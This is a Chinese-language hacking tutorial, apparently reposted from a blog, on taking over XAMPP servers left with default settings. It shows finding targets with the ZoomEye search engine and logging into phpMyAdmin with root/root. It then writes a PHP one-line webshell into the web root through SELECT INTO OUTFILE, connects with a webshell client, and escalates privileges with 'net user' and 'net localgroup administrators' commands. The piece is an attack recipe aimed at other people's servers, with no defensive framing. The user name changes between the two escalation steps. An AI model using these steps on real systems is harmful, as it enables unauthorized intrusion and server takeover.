?　　

xampp默認配置拿shell

　　首先我們先來科普一下xampp（Apache+MySQL+PHP+PERL）是一個功能強大的建 XAMPP 軟件站集成軟件包 是一個易于安裝且包含 MySQL、PHP 和 Perl 的 Apache 發行版。XAMPP 的確非常容易安裝和使用：只需下載，解壓縮，啟動即可。 然后在安裝xampp的過程中 很多網站管理員對于mysql數據庫密碼 都會直接 默認? 所以 就照成了這個漏洞的產生

好了 廢話不多說 我們直接上神器鐘馗之眼 server-status – server-info – phpmyadmin 賬號密碼: root/root port:80

　　如圖找到一個網站 進去 初始的phpinfo 箭頭指的是phpmyadmin的登陸地址

我們記下網站根目錄C:/Program Files (x86)/xampp/xampps/htdocs

　　點進去之后我們輸入 默認的用戶名和密碼 root root

　　進去之后我們呢輸入sql語句 select ‘php一句話’ into outfile ‘C:/Program Files (x86)/xampp/xampps/htdocs/mgsrc.php’ ? 寫入一句話?

?

　　菜刀連之? 然后我們在說一下提權

　　（1）首先輸入命令添加用戶：

　　net user test01 Mgs?1234567890 /add

　　（2）將普通用戶加入到超級管理組administrators

　　然后輸入net localgroup administrators mgsrc1 /add?

（ps:在提權的時候 也走了很多彎路 這臺服務器 的密碼策略沒關閉 所以 密碼組合必須為一個大寫字母 加一個符號然后加數字? 而且 這臺服務器 密碼位數不能超過14位 不然就無響應）

?

文章轉發地址：http://www.hackdig.com/04/hack-34524.htm

轉載于:https://www.cnblogs.com/my1e3/p/6216286.html

總結

以上是生活随笔為你收集整理的xampp默认配置拿shell的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。